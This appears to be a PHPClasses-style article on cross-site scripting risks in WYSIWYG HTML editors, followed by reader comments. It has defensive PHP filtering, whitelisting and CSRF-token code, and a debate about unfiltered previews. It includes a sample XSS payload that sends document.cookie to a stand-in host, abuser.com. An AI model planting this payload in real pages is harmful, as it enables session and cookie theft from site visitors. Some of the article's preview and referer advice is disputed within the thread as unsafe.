HTML Editors
HTML editors are special form fields that allow Web site users to visually edit (WYSIWYG) rich text content formatted with HTML tags. HTML editors are powerful, but sites that use them without proper security measures may be abused.
The W3C HTML standards do not support HTML editors explicitly, but for some time Internet Explorer, the Mozilla family of browsers, and other browsers have shipped with built-in extensions that make HTML editors possible.
Several packages, such as FCKEditor, TinyMCE and Xinha, already take advantage of these extensions to provide browser-independent ways of integrating HTML editors into form-based Web pages.
Cross-site scripting: XSS
HTML editors are great. However, care must be taken to avoid security abuses. An application that uses HTML editors expects the submitted HTML content to arrive correctly formatted and well-formed. That is what happens when real users edit the content with real browsers.
However, an attacker may create a program that pretends to be a real browser and submits specially crafted HTML with JavaScript that may open security holes.
One of the most common types of attack is known as cross-site scripting, or XSS. This kind of attack consists of submitting HTML with JavaScript code that sends to another site the cookies that the browser holds for the current site.
Consider for instance the following HTML excerpt with malicious JavaScript:
<script>
document.write('<script src="http://www.abuser.com/get_cookies?cookies=');
document.write(document.cookie);
document.write('"></script>');
</script>
If an attacker submits HTML like this, for instance to publish an article, and the site accepts it without discarding the harmful JavaScript code, then once the article is published the site cookies of every user who opens the article page will be sent to the abuser's site.
The problem is that cookies are often used as session identifiers of logged-in users. If somebody steals the cookies that your browser uses to access a domain, that person may be able to access the same site on your behalf and abuse the privileges that you have.
Depending on what each site provides, the consequences can be catastrophic. Imagine you are using an e-commerce site that stores information about your credit card and displays it in your profile pages. An attacker may steal that information and cause you financial trouble.
Of course the security of most e-commerce sites is not so weakly implemented, but you can easily imagine a myriad of situations in which a cross-site scripting exploit may cause major headaches.
Avoiding XSS security attacks
To avoid the problem, first you need to detect when it is happening, and second do something about it.
To detect when the problem is happening, you need to parse the HTML document and locate unsafe HTML constructs. That includes not only <script> tags, but also other exploitable tags and attributes that trigger JavaScript execution, for instance event handling attributes such as onload, onclick, etc.
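As a rough illustration of that detection step, the following PHP sketch parses a submitted fragment with the DOM extension and reports a few constructs that can run JavaScript. The function name findUnsafeConstructs and the short list of tags it checks are assumptions made for this example; the list is far from complete, so this shows the idea and is not a usable filter.

```php
<?php
// Hypothetical helper: lists constructs in an HTML fragment that can execute JavaScript.
// The checks below are deliberately minimal and do NOT cover every known XSS vector.
function findUnsafeConstructs(string $html): array
{
    $found = [];
    $doc = new DOMDocument();
    // Collect parser warnings internally instead of printing them for malformed markup.
    $previous = libxml_use_internal_errors(true);
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    foreach ($doc->getElementsByTagName('*') as $element) {
        $tag = strtolower($element->nodeName);
        if (in_array($tag, ['script', 'iframe', 'object', 'embed'], true)) {
            $found[] = "<$tag> element";
        }
        foreach ($element->attributes as $attribute) {
            $name = strtolower($attribute->nodeName);
            // Remove whitespace so that "java script:" style obfuscation is still matched.
            $value = strtolower(preg_replace('/\s+/', '', (string) $attribute->nodeValue));
            if (strpos($name, 'on') === 0) {
                // Event handler attributes such as onload or onclick.
                $found[] = "$name attribute on <$tag>";
            } elseif (in_array($name, ['href', 'src'], true) && strpos($value, 'javascript:') === 0) {
                $found[] = "javascript: URL in $name on <$tag>";
            }
        }
    }
    return $found;
}
```

An empty array means that none of these particular checks matched. It does not mean that the HTML is safe.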
As you may imagine, detecting every circumstance that may allow an XSS exploit is not an easy task. Fortunately, there are some ready-to-use solutions provided by people who have been working on this subject for a while.

One of the most interesting solutions I have come across is the PHP Input Filter class. It was developed by Daniel Morris with contributions from Gianpaolo Racca, Ghislain Picard, Marco Wandschneider, Chris Tobin and Andrew Eddie.
This class was nominated for the PHP Programming Innovation Award edition of May 2005 of the PHPClasses site.
It takes a string of HTML data as input and returns the HTML with harmful tags and attributes removed.
Here is an example of usage:
<?php
// include class file
require_once("class.inputfilter_clean.php");

if (isset($_POST["input"])) {
    // Create the class object
    $myFilter = new InputFilter();
    // process input
    $result = $myFilter->process($_POST["input"]);
}
?>
Do not let an attacker realize he failed
If the cleaned HTML differs from the original, the submission probably did not come from the HTML editor and your site may be under attack. In that case you can respond in different ways.
I recommend that you pretend that the attack was not detected. Just present the same pages as if the content was accepted. The reason for this is to not let the attacker determine whether he succeeded or failed.
The reality is that it is very hard, if possible at all, to provide 100% foolproof solutions. You may implement security measures that protect you from the types of attack that are known today, but in the future there may always be new forms of attack for which you are not yet prepared.
If you expose any information that lets the attacker detect whether the spoofed HTML was filtered or not, you may be helping him figure out how your filter works and how to bypass it with a different attack method.
Let's say, for instance, that you have a site that publishes articles submitted by untrusted users. If your site shows a preview of the article during the submission, do not use the filtered HTML to display the preview.
Use only the original HTML. If the attacker is attempting an XSS attack, no harm will happen because only the cookies of the attacker session will be sent to the remote attacker site.
When the harmful HTML is finally submitted, you can discard the submission. Just present the same successful submission message, as if the article had been accepted. It is also worthwhile to log attack attempts for further study.
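The final submission step described above could be sketched in PHP as follows. The function handleSubmission and its three callables are hypothetical names introduced for this example: $filter stands for any HTML filter that returns cleaned HTML, while $store and $log stand for whatever the application uses to save articles and record attack attempts.

```php
<?php
// Hypothetical handler for the final submission (not for the preview).
// $filter returns cleaned HTML; $store saves an article; $log records a suspect submission.
function handleSubmission(string $html, callable $filter, callable $store, callable $log): string
{
    $cleaned = $filter($html);
    if ($cleaned !== $html) {
        // The filter changed something: keep a copy for study and discard the article.
        $log($html);
    } else {
        $store($cleaned);
    }
    // Same message in both cases, so the response reveals nothing about the filter.
    return 'Thank you, your article was submitted.';
}
```

One caveat with this sketch is that a strict comparison also flags harmless differences, for instance when the filter normalizes whitespace or attribute quoting, so a real filter would need to leave editor-generated HTML untouched for the comparison to be meaningful.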

Comments
I took a short look at Daniel's class and saw that it's based on a blacklist filter. I think a white list filter is easier to maintain, but it may be difficult to implement together with an HTML editor.
Another class, which uses a white list for tags and a blacklist for attributes, was just released by Frederic Minne.
http://www.phpclasses.org/htmlsanitizer
Anyway, keep in mind that all these classes only address the types of exploits we know today that could work on today's browsers. In the future new XSS exploits may be discovered. Filtering solutions like these are much better than nothing, but they may need to be updated to take care of future exploits.
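To make the white list idea concrete, here is a minimal PHP sketch built on the DOM extension. It is not how either of the classes mentioned above works internally. The ALLOWED_TAGS table, the function name whitelistHtml and the URL pattern are all assumptions chosen for the example. Anything not listed is removed, so new and unknown tags are rejected by default.

```php
<?php
// Hypothetical white list: tag name => attributes permitted on that tag.
const ALLOWED_TAGS = [
    'p' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'ul' => [], 'ol' => [], 'li' => [], 'br' => [],
    'a' => ['href'],
];

function whitelistHtml(string $html): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true);
    // Note: without a charset hint, loadHTML() treats the input as ISO-8859-1.
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // The first <div> in document order is the wrapper added above.
    $root = $doc->getElementsByTagName('div')->item(0);
    // Copy the live node list first, because nodes are removed while looping.
    $elements = iterator_to_array($root->getElementsByTagName('*'), false);
    foreach ($elements as $element) {
        $tag = strtolower($element->nodeName);
        if (!array_key_exists($tag, ALLOWED_TAGS)) {
            // Unknown tag: drop the element together with its content.
            if ($element->parentNode !== null) {
                $element->parentNode->removeChild($element);
            }
            continue;
        }
        foreach (iterator_to_array($element->attributes, false) as $attribute) {
            $name = strtolower($attribute->nodeName);
            $isAllowed = in_array($name, ALLOWED_TAGS[$tag], true);
            // Links may only use a few harmless URL forms.
            $isSafeUrl = $name !== 'href'
                || preg_match('#^(https?://|mailto:|/)#i', trim((string) $attribute->nodeValue)) === 1;
            if (!$isAllowed || !$isSafeUrl) {
                $element->removeAttribute($attribute->nodeName);
            }
        }
    }

    // Serialize only the children of the wrapper.
    $output = '';
    foreach ($root->childNodes as $child) {
        $output .= $doc->saveHTML($child);
    }
    return $output;
}
```

The difficulty with HTML editors mentioned above shows up in the table: every tag and attribute that the editor can legitimately produce has to be listed, or the filter will strip content that users created in good faith.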
First of all, I'm glad that Zend's giving XSS a bit of recognition. Any form of XSS is an extremely serious web-vulnerability, and is an especially troublesome problem to fix.
However, by displaying submitted HTML in preview mode without filtering, you introduce a Type 1 XSS vulnerability into your website: with a little bit of social engineering, it is entirely possible to trick an unsuspecting user into "previewing" the malicious HTML. Sorry, but security by obscurity is not going to work, especially if you're using an open-source filter library.
The recommended HTML filter class, PHP Input Filter, has several vulnerabilities in it. While not XSS, they are just as serious. The largest one is that the class is unable to detect an unclosed tag in the layout (for example, try inserting a <b> tag without the corresponding closing tag). kses, another HTML filter, has a similar problem, and you'll need to implement tag-balancing code to get around the trouble should you choose to stick with the library.
Predictably, I strongly recommend that users who need to accept rich HTML documents from WYSIWYG editors use my library, HTML Purifier <http://hp.jpsband.org/>
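For readers wondering what tag balancing involves, one simple approach is to let an HTML parser rebuild the fragment and serialize it again. The PHP sketch below does that with the DOM extension. It is not taken from HTML Purifier, kses or PHP Input Filter, and the function name balanceTags is made up for this example.

```php
<?php
// Hypothetical helper: closes unclosed tags by round-tripping the fragment through the parser.
function balanceTags(string $html): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true);
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // The first <div> in document order is the wrapper added above.
    $root = $doc->getElementsByTagName('div')->item(0);
    $output = '';
    foreach ($root->childNodes as $child) {
        $output .= $doc->saveHTML($child);
    }
    return $output;
}
```

With this in place, an unclosed <b> in one user's article can no longer turn the rest of the page bold. It does nothing about XSS on its own, so it would have to be combined with a filter.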
As for your comment regarding displaying the preview, maybe the article is not clear enough, but the recommendation is to "show" the preview only to the submitter. The article also suggests discarding the article altogether and pretending that it was accepted if it is found to contain exploits. So no user will see HTML documents with XSS exploits.
Regarding the vulnerabilities that you detected in the PHP Input Filter class, it would be useful if you could post an article in the support forum of that class, so the author can comment and eventually fix the class.
Finally, regarding your HTML Purifier, it seems quite extensive. Maybe you would like to consider submitting the whole package or at least part to the PHPClasses site, so you can benefit from more exposure to your work and the thousands of users that visit the site can try it and provide you more feedback.
Yep, that's correct. The problem is that you can't be absolutely certain that the submitter is the attacker. Without a nonce, using CSRF all a user has to do is visit a malicious page and they could post arbitrary data on another website. If the preview function allows XSS, you put users at risk. It's a bit tricky to wrap your head around, but CSRF has definitely been troublesome for websites like Digg in the past.
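For illustration, the nonce mentioned above could look like the following PHP sketch: the site stores a random token in the session when it renders the form, embeds it in a hidden field, and refuses any submission that does not send it back. The function names and the form_token key are assumptions for this example, and $session stands in for $_SESSION so that the code can be run outside a web request.

```php
<?php
// Hypothetical helpers; pass $_SESSION as $session in a real request.
function issueFormToken(array &$session): string
{
    // 32 random bytes, hex encoded, to be placed in a hidden form field.
    $session['form_token'] = bin2hex(random_bytes(32));
    return $session['form_token'];
}

function isValidFormToken(array &$session, ?string $submitted): bool
{
    $expected = $session['form_token'] ?? null;
    // Single use: forget the token whether or not the check passes.
    unset($session['form_token']);
    // hash_equals() compares in constant time.
    return is_string($expected) && is_string($submitted) && hash_equals($expected, $submitted);
}
```

A malicious page on another site cannot read the token, so a form that it submits through the victim's browser fails the check and the preview is never rendered.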
> The article also suggests discarding the article altogether and pretending that it was accepted if it is found to contain exploits. So no user will see HTML documents with XSS exploits.
It's an interesting idea, but I wouldn't personally do it, by virtue of the fact that it's confusing! I get annoyed enough when mod_security intervenes during application security testing and spits out a mysterious 503 error.
> Regarding the vulnerabilities that you detected in the PHP Input Filter class, it would be useful if you could post an article in the support forum of that class, so the author can comment and eventually fix the class.
I'm not certain the class is still being maintained. The last update was a year and a half ago, and the site that originally hosted the code actually disappeared off the web, although the PHP Classes page remains. Anyway, there are better "bad" solutions out there, such as PEAR's HTML_Safe class, so if you're not willing to roll an HTML Purifier solution, you can always go with that one.
> Finally, regarding your HTML Purifier, it seems quite extensive.
It is. In fact, that's the primary complaint with my library. ;-) But HTML is a complex datatype, so the complexity is all necessary.
> Maybe you would like to consider submitting the whole package or at least part to the PHPClasses site, so you can benefit from more exposure to your work and the thousands of users that visit the site can try it and provide you more feedback.
I've had a bad experience with PHPClasses in the past, and I'm not so fond of the fact that they require you to register in order to download certain classes (really, almost all of them, although it's not 100%). Still, it may provide some good exposure, so I'll consider it.
This is not to say that evangelism in favor of HTML Purifier is discouraged. In fact, it would be greatly appreciated. HTML Purifier is slowly gaining momentum, but I haven't really invested the time to go on a "marketing blitz" for the library. Go figure... :-/
Anyway, couldn't CSRF-triggered abuses be avoided if the article preview were only displayed when the referrer URL belongs to the same site?
The idea of pretending that the article with XSS exploits was accepted is precisely to confuse the attacker and tire him until he gives up and goes off to attack an easier site! ;-)
As for your package being extensive, that is not a problem unless it is too slow for regular usage.
Regarding the PHPClasses site, there is a bit of misunderstanding. The login requirement to download is not mandatory. Each author can decide whether their package files are to be made available without login or not.
The detail is that when files are made available for download without requiring login, the site does not keep track of who downloaded each package. In that case, the package downloads are not counted and the package may not appear in the top download charts, which is a big deal for some authors for natural ego-related reasons.
Also, when you update a package the site can send package update alerts to the users that downloaded the package. That can only happen when the site keeps track of who downloaded each package.
Currently the only problem with distributing packages that have many files is that each file needs to be uploaded and described individually. In the future remote CVS/Subversion bulk import will be made available, but it will take time. So, for now, it would be a lot of work for you to submit the whole package.
This sounds inherently insecure to me. Though I don't know exactly how, couldn't headers be forged without a user knowing? Or an XSS attack routed through the form itself?
Unfiltered previews won't accomplish much in the long run, and it introduces a new set of problems. The attacker will eventually realize the apparently-successful XSS attacks don't work, and the testing process will be adjusted accordingly. Then you're back to square one. If users are allowed to edit their HTML by hand, the preview is incorrect (and useless) if they've made an HTML mistake.
If the referer does not match the real site domain, the idea is to not show the preview at all regardless of whether the form contains legitimate HTML generated by the HTML editor or HTML with XSS.
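The referer rule just described could be sketched in PHP as below. The function name isSameSiteReferer and the idea of passing the site's host name as a parameter are assumptions for this example. In a real request the first argument would come from $_SERVER['HTTP_REFERER'], which may be missing.

```php
<?php
// Hypothetical check: true only when the Referer header names the site's own host.
function isSameSiteReferer(?string $referer, string $siteHost): bool
{
    if ($referer === null || $referer === '') {
        // Some browsers and proxies omit the header; treat that as "do not show the preview".
        return false;
    }
    $host = parse_url($referer, PHP_URL_HOST);
    // Compare the whole host name, so "www.example.com.evil.net" does not pass.
    return is_string($host) && strcasecmp($host, $siteHost) === 0;
}
```

This only concerns requests that a victim's browser sends from another site. Someone who scripts his own requests can set the header to anything, as the previous comment points out, but in that case only the attacker himself sees the preview.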
It is irrelevant whether the attacker figures out that the apparently successful XSS attacks never actually succeed. The point here is not to help him discover when he has managed to bypass the HTML filters with new techniques.
As for hand-edited HTML, that is outside the scope of this article, which is about using HTML editors.
If you do allow HTML hand editing, you can validate the HTML and tell the user there was a validation error, regardless of whether there are any XSS attacks or not. That way the preview only appears when the HTML is valid.